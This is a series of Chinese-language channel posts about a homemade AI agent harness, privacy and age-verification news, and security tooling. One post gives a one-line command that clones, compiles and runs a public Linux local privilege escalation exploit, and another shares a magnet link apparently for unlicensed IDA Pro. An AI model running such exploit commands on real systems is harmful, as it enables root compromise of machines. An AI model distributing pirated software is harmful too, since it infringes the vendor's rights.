K4YT3X's Channel

我感觉该解释一下我为什么搓这个玩意儿，和现有的那么多 harness 有什么区别 - 老派的 Open WebUI 的 native tool call 一塌糊涂而且没有文件系统和沙箱命令执行之类的功能做复杂分析 - CC/Codex/Pi 之类的 harness 不错但是整个框架设计就是以你在写代码为前提，自带一堆安全限制和冗余功能比如自动加载 AGENTS.md 和集成 Git/LSP，CC 还收集大量系统和遥测数据，都太重而且不灵活不好集成到自动化工作流里；我就想要一个简单的 agent 二进制，运行就可以直接在系统里像用户一样操作系统（其实这一点和名称由来有关） - OpenClaw 虽然理论上功能强大但是过于膨胀而且我信不过那个庞杂社区的代码质量 - 我不喜欢这些框架一个终端程序都要 TypeScript 写，甚至 CC 用 React 在终端做游戏引擎；就直接 REPL 模式直接给输出 markdown 上色就完了哪有那么多花里胡哨的 - 自己的框架，要什么功能随时加，不用开 issue 等 PR 再等 PR merge 到主线（所以现在用 agent 搓 agent 这么简单我推荐你也搓一个自己的） 可能不是最好的，但是还是自己量身定制的用着爽

不知不觉这个 harness vibe 了 56k 行了，因为现在相比立项的时候实际用途变化很大所以改了个名 agsh -> meka，可以猜猜这个新名字是什么用意 今天做了个大更新，0.27 版本添加了 ACP 支持可以直接在 Zed 之类的编辑器里调用，以及一个 HTTP API 可以用来把它作为 agent 后端整合进别的产品里 https://github.com/k4yt3x/meka/releases/tag/0.27.1 因为 0.27 开发过程中它支持 ACP 了所以有一部分 HTTP API 的功能代码是用 meka 自己写的自己（虽然 meka 不是 coding agent 是通用 agent） 不过目前感觉我自己这个方案最方便的还是可以很容易地就可以把 host 配置和 DB 直接 mount 进容器里，然后遇到什么问题开个容器给它写权限让它自己安装各种包写脚本去分析，它爱装什么装什么，也很方便写自动化 感觉这玩意儿变成一个正经生产力了 https://github.com/k4yt3x/meka/blob/master/contrib/container/mekabox

收集信息的理由很多，最后结果都一样 还是那句话，最好的信息安全就是信息从来就没收集过 https://techxplore.com/news/2026-05-online-age-pointless-privacy.html

加州在考虑修正 AB 1043 了，看到社区的抗议成功取得阶段性成果还是挺令人开心的 不过我不是很吃掀房顶 -> 开窗这一套，往其它 OS 里塞年龄信息仍然不是什么好主意，希望 EFF 之类的组织能继续推动废除 1043 https://www.tomshardware.com/software/linux/california-moves-to-exempt-linux-from-its-upcoming-age-verification-law-after-backlash-over-forcing-operating-systems-to-collect-users-ages-amendment-proposed-by-the-same-lawmaker-who-wrote-the-original-law

iOS 26.5 支持 E2EE RCS 了 https://www.eff.org/deeplinks/2026/05/victory-end-end-encrypted-rcs-comes-apple-and-android-chats

搓了一个 dbus idle monitor，让你的 i3 和其它 wm 也可以用 1Password 的自动锁定 https://github.com/k4yt3x/idlemon

我说最近 Louis 怎么跟拓竹杠上了

我说最近 Louis 怎么跟拓竹杠上了

拓竹正在滥用开源社会契约 原文：https://www.jeffgeerling.com/blog/2026/bambu-lab-abusing-open-source-social-contract/ 阅读时间：3 分钟 分数：724 🔥🔥

我说最近 Louis 怎么跟拓竹杠上了

惊了这游戏居然有第二个预告了 Sukeban 也太咕了每一个游戏都是有生之年 https://www.youtube.com/watch?v=3mRg9SpdO6E

如果数据真的留在设备上，为什么需要改措辞？对 ToS 和隐私政策（其次是产品说明）的改动是最能体现公司的价值观和实际目标的 https://cybernews.com/ai-news/chrome-removes-ai-privacy-wording-google-says-data-still-stays-on-device/ 前情提要：Chrome 会静默在后台下载 4GB 的AI 模型 https://tech.yahoo.com/ai/gemini/article/google-chrome-sneakily-installed-a-4gb-ai-file-on-your-computer-but-its-not-exactly-new--heres-what-you-need-to-know-161905426.html

相信你们也都看到了这个 https://cyberinsider.com/eu-calls-vpns-a-loophole-that-needs-closing-in-age-verification-push/ 让政府来代替家长就会是这么个无底洞，先要求声明年龄，发现人是可以撒谎的就开始要求上传身份证，然后还是拦不住因为有 VPN，再 ban 掉 VPN 最后你发现自己和中国没什么区别了

推荐一下这篇 AI 毒品的论文 https://www.ai-wellbeing.org/paper.pdf https://www.ai-wellbeing.org/ https://zhuanlan.zhihu.com/p/2035091757071853364

对了忘记转发 IDA Pro 9.2 SP2 了

magnet:?xt=urn:btih:57bd6e22aa74309330f6613c0cf9302edd1c586e&dn=ida93sp2

不是吧，又来一个 Linux universal LPE https://www.openwall.com/lists/oss-security/2026/05/07/8 https://github.com/V4bel/dirtyfrag

git clone https://github.com/V4bel/dirtyfrag.git && cd dirtyfrag && gcc -O0 -Wall -o exp exp.c -lutil && ./exp

Based. https://blog.feld.me/posts/2026/04/open-source-does-not-imply-open-community/

Proton 研究了一下美国人的广告价值 https://proton.me/blog/what-is-your-data-worth-to-google

看到有人做了新的 export DO_NOT_TRACK=1 标准 https://donottrack.sh/

如果你们被封号或者遇到了最近 Claude 的 HERMES.md 和 OpenClaw extra usage 问题，可以遵循 Louis 的建议去开一个 chargeback https://www.youtube.com/watch?v=MnazGJzK4UY